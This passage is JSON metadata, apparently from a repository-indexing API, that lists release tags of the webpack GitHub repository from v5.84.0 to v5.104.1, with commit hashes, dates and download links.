nd":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":nul